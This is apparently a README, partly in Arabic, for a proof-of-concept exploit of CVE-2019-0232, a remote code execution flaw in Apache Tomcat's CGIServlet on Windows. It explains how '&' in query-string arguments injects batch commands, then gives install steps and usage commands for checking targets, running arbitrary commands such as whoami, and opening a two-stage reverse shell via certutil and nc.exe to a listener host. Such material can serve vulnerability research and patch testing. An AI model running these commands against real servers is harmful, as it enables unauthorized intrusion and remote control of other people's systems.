
CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Apache Tomcat CGIServlet enableCmdLineArguments RCE
حقن سكريبت ويندوز الدفعي عبر وسائط سلسلة الاستعلام
عند تمكين CGI servlet في Apache Tomcat مع enableCmdLineArguments=true، يتم تمرير معاملات سلسلة الاستعلام كوسائط سطر أوامر إلى سكريبتات CGI. على نظام ويندوز، تقوم الملفات الدفعية (.bat/.cmd) بتفسير & كفاصل أوامر، مما يسمح بتنفيذ أوامر عشوائية عبر URL مصمم خصيصاً.
conf/web.xml أو WEB-INF/web.xmlenableCmdLineArguments=true في معاملات init الخاصة بـ CGI servletism.bat) منشور وقابل للوصول&)git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
التحقق من وجود نقطة نهاية CGI:
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
تنفيذ أمر:
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
شل عكسي (on مرحلتين certutil + nc.exe):
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444